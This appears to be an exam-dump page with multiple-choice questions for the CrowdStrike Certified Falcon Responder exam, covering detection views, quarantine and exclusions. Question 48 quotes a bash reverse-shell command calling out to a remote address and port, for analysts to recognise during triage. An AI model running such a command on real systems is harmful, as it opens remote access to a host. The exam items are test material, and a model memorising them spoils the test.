CCFR-201b Exam Dumps - CrowdStrike CCFR Questions and Answers

Question # 44

What does the Full Detection Details option provide?

Options:

A.

It provides a visualization of program ancestry via the Process Tree View

B.

It provides a visualization of program ancestry via the Process Activity View

C.

It provides a detailed list of detection events via the Process Table View

D.

It provides a detailed list of detection events via the Process Tree View

Question # 45

In the full detection tree view, icons provide visual cues about the telemetry. What does the specific icon representing a 'Falcon' (blue bird) indicate to the responder?

Options:

A.

The file has been successfully quarantined by the sensor.

B.

There is related Intelligence (Intel) data available for this detection.

C.

The process has been identified as a legitimate system file.

D.

The host is currently undergoing a remote live response session.

Question # 46

An administrator needs to download a file for analysis that was blocked by the sensor. Where are quarantine files located within the Falcon UI?

Options:

A.

Investigate > Quarantine

B.

Endpoint Security > Monitor > Quarantined Files

C.

Configuration > Response > Quarantine

D.

Dashboards > Security > Quarantine

Question # 47

An analyst wants to see the raw events behind a specific detection. Which icon in the UI allows them to pivot directly to an event search?

Options:

A.

Shield icon

B.

Spyglass icon

C.

Trash can icon

D.

Gear icon

Question # 48

Refer to the image.

Command line:

/bin/bash -c sh -i > & /dev/tcp/172.17.0.21/4444 0 > & 1

File path:

/bin/bash

You receive a detection on the Bash process indicating the command line in the image above.

Based on the command line, what is the next step you should take?

Options:

A.

Investigate the host for manipulation of the root folder

B.

Investigate the host for any Potentially Unwanted Programs (PUP)

C.

Investigate the host for an interactive remote terminal

D.

Investigate the host for developer activity

Question # 49

Sensor Visibility Exclusion patterns are written in which syntax?

Options:

A.

Glob Syntax

B.

Kleene Star Syntax

C.

RegEx

D.

SPL (Splunk)

Question # 50

An analyst notices a detection that has been automatically flagged with the 'New Activity' status. Which of the following statements best describes what this status indicates?

Options:

A.

A brand new detection has been triggered on a host that was recently added to the network.

B.

A detection that was previously moved to a resolved status has generated new telemetry and activity.

C.

A user has logged into a machine for the first time since the sensor was installed.

D.

The Falcon Overwatch team has manually verified that the detection is an active threat.

Question # 51

What happens when you create a Sensor Visibility Exclusion for a trusted file path?

Options:

A.

It excludes host information from Detections and Incidents generated within that file path location

B.

It prevents file uploads to the CrowdStrike cloud from that file path

C.

It excludes sensor monitoring and event collection for the trusted file path

D.

It disables detection generation from that path; however, the sensor can still perform prevention actions

Question # 52

Evaluate the following process tree observed in a detection:

root > smss.exe > winlogon.exe > userinit.exe > explorer.exe > windows_media_player_y35s21-4ak.exe

Based on the parent-child relationships, which entry source is most likely?

Options:

A.

A remote service exploitation targeting a system process.

B.

A phishing attack where the user executed a malicious file from the desktop.

C.

A scheduled task running under the SYSTEM account.

D.

A supply chain attack targeting the Windows Boot manager.

Question # 53

What does pivoting to an Event Search from a detection do?

Options:

A.

It gives you the ability to search for similar events on other endpoints quickly

B.

It takes you to the raw Insight event data and provides you with a number of Event Actions

C.

It takes you to a Process Timeline for that detection so you can see all related events

D.

It allows you to input an event type, such as DNS Request or ASEP write, and search for those events within the detection

Exam Code: CCFR-201b
Exam Name: CrowdStrike Certified Falcon Responder
Last Update: Jul 5, 2026
Questions: 199